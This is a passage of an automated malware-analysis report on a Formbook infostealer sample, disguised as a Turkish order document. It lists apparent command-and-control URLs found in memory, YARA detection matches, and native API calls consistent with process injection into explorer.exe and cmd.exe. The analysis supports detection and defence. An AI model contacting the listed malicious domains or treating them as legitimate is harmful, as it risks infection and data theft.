Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qqfoodsolutions.com
Source: explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qqfoodsolutions.com/pz12/
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.qqfoodsolutions.comReferer:
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.salesgymshark.shop
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.salesgymshark.shop/pz12/
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.salesgymshark.shop/pz12/www.businessbroadway.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.salesgymshark.shopReferer:
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vanessasmobilespa.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vanessasmobilespa.com/pz12/
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vanessasmobilespa.com/pz12/www.98980901.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vanessasmobilespa.comReferer:
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xcxocef.shop
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xcxocef.shop/pz12/
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xcxocef.shop/pz12/www.chalkandthimble.com
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xcxocef.shopReferer:
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xiangadvanced.site
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xiangadvanced.site/pz12/
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xiangadvanced.site/pz12/www.cripmz.xyz
Source: explorer.exe, 00000007.00000003.3094419868.000000000CA4E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4556319565.000000000CA5C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096157265.000000000CA57000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.xiangadvanced.siteReferer:
Source: explorer.exe, 00000007.00000000.2148003902.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4552727694.000000000C54A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3100767881.000000000C547000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000007.00000000.2135493161.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3102199089.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3566241603.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4542934252.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000007.00000003.3094747325.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4545593539.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000007.00000000.2135493161.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4542501941.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000007.00000002.4540828283.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3096357225.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2133108106.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 00000007.00000003.3105365605.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094747325.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4546550713.0000000009C22000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000007.00000002.4556895478.0000000010FBF000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000008.00000002.4540713209.000000000418F000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://loyalbahis356.com/pz12/?XvRxR=rTfdhh5hH2&NBtT=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/
Source: explorer.exe, 00000007.00000003.3100077346.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.3094747325.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4546607897.0000000009C96000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000007.00000002.4551366329.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2148003902.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000007.00000003.3094747325.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4545593539.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000007.00000003.3094747325.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2144614594.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4545593539.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon

E-Banking Fraud

Malicious sample detected (through community Yara rule)

Source: Yara match	File source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4539184982.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4538973840.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2128443100.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4539570666.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2190313721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.Ticari Siparis Belgesi 26 07 2024 17545000600.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.4539184982.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4539184982.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.4539184982.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.4538973840.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4538973840.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.4538973840.0000000002E30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2128443100.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.2128443100.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.2128443100.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.4539570666.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.4539570666.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.4539570666.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.4556728675.000000001047C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 00000006.00000002.2190313721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.2190313721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2190313721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Ticari Siparis Belgesi 26 07 2024 17545000600.exe PID: 6520, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: Ticari Siparis Belgesi 26 07 2024 17545000600.exe PID: 3116, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cmd.exe PID: 7364, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0041A360 NtCreateFile,	6_2_0041A360
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0041A410 NtReadFile,	6_2_0041A410
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0041A490 NtClose,	6_2_0041A490
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0041A540 NtAllocateVirtualMemory,	6_2_0041A540
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0041A35A NtCreateFile,	6_2_0041A35A
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_0041A40A NtReadFile,	6_2_0041A40A
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242B60 NtClose,LdrInitializeThunk,	6_2_01242B60
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_01242BF0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242AD0 NtReadFile,LdrInitializeThunk,	6_2_01242AD0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_01242D30
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_01242D10
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_01242DF0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242DD0 NtDelayExecution,LdrInitializeThunk,	6_2_01242DD0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_01242C70
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_01242CA0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242F30 NtCreateSection,LdrInitializeThunk,	6_2_01242F30
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242FB0 NtResumeThread,LdrInitializeThunk,	6_2_01242FB0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242F90 NtProtectVirtualMemory,LdrInitializeThunk,	6_2_01242F90
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242FE0 NtCreateFile,LdrInitializeThunk,	6_2_01242FE0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_01242EA0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_01242E80
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01244340 NtSetContextThread,	6_2_01244340
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01244650 NtSuspendThread,	6_2_01244650
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242BA0 NtEnumerateValueKey,	6_2_01242BA0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242B80 NtQueryInformationFile,	6_2_01242B80
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242BE0 NtQueryValueKey,	6_2_01242BE0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242AB0 NtWaitForSingleObject,	6_2_01242AB0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242AF0 NtWriteFile,	6_2_01242AF0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242D00 NtSetInformationFile,	6_2_01242D00
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242DB0 NtEnumerateKey,	6_2_01242DB0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242C00 NtQueryInformationProcess,	6_2_01242C00
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242C60 NtCreateKey,	6_2_01242C60
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242CF0 NtOpenProcess,	6_2_01242CF0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242CC0 NtQueryVirtualMemory,	6_2_01242CC0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242F60 NtCreateProcessEx,	6_2_01242F60
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242FA0 NtQuerySection,	6_2_01242FA0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242E30 NtWriteVirtualMemory,	6_2_01242E30
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01242EE0 NtQueueApcThread,	6_2_01242EE0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01243010 NtOpenDirectoryObject,	6_2_01243010
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01243090 NtSetValueKey,	6_2_01243090
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012435C0 NtCreateMutant,	6_2_012435C0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_012439B0 NtGetContextThread,	6_2_012439B0
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01243D10 NtOpenProcessToken,	6_2_01243D10
Source: C:\Users\user\Desktop\Ticari Siparis Belgesi 26 07 2024 17545000600.exe	Code function: 6_2_01243D70 NtOpenThread,	6_2_01243D70
Source: C:\Windows\explorer.exe	Code function: 7_2_10465E12 NtProtectVirtualMemory,	7_2_10465E12
Source: C:\Windows\explorer.exe	Code function: 7_2_10464232 NtCreateFile,	7_2_10464232
Source: C:\Windows\explorer.exe	Code function: 7_2_10465E0A NtProtectVirtualMemory,	7_2_10465E0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007B7460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	8_2_007B7460
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A643A NtOpenThreadToken,NtOpenProcessToken,NtClose,	8_2_007A643A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A4823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	8_2_007A4823
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A64CA NtQueryInformationToken,	8_2_007A64CA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007BA135 NtSetInformationFile,	8_2_007BA135
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A6500 NtQueryInformationToken,NtQueryInformationToken,	8_2_007A6500
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007BC1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	8_2_007BC1FA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_00794E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,	8_2_00794E3B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_007A4759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,	8_2_007A4759
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2B60 NtClose,LdrInitializeThunk,	8_2_037C2B60
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2AD0 NtReadFile,LdrInitializeThunk,	8_2_037C2AD0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2F30 NtCreateSection,LdrInitializeThunk,	8_2_037C2F30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2FE0 NtCreateFile,LdrInitializeThunk,	8_2_037C2FE0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_037C2EA0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2D10 NtMapViewOfSection,LdrInitializeThunk,	8_2_037C2D10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2DF0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_037C2DF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2DD0 NtDelayExecution,LdrInitializeThunk,	8_2_037C2DD0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2C70 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_037C2C70
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2C60 NtCreateKey,LdrInitializeThunk,	8_2_037C2C60
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2CA0 NtQueryInformationToken,LdrInitializeThunk,	8_2_037C2CA0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C35C0 NtCreateMutant,LdrInitializeThunk,	8_2_037C35C0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C4340 NtSetContextThread,	8_2_037C4340
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C4650 NtSuspendThread,	8_2_037C4650
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2BF0 NtAllocateVirtualMemory,	8_2_037C2BF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2BE0 NtQueryValueKey,	8_2_037C2BE0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2BA0 NtEnumerateValueKey,	8_2_037C2BA0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2B80 NtQueryInformationFile,	8_2_037C2B80
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2AF0 NtWriteFile,	8_2_037C2AF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2AB0 NtWaitForSingleObject,	8_2_037C2AB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2F60 NtCreateProcessEx,	8_2_037C2F60
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2FB0 NtResumeThread,	8_2_037C2FB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2FA0 NtQuerySection,	8_2_037C2FA0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2F90 NtProtectVirtualMemory,	8_2_037C2F90
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2E30 NtWriteVirtualMemory,	8_2_037C2E30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2EE0 NtQueueApcThread,	8_2_037C2EE0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2E80 NtReadVirtualMemory,	8_2_037C2E80
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2D30 NtUnmapViewOfSection,	8_2_037C2D30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2D00 NtSetInformationFile,	8_2_037C2D00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2DB0 NtEnumerateKey,	8_2_037C2DB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 8_2_037C2C00 NtQueryInformationProcess,	8_2_037C2C00
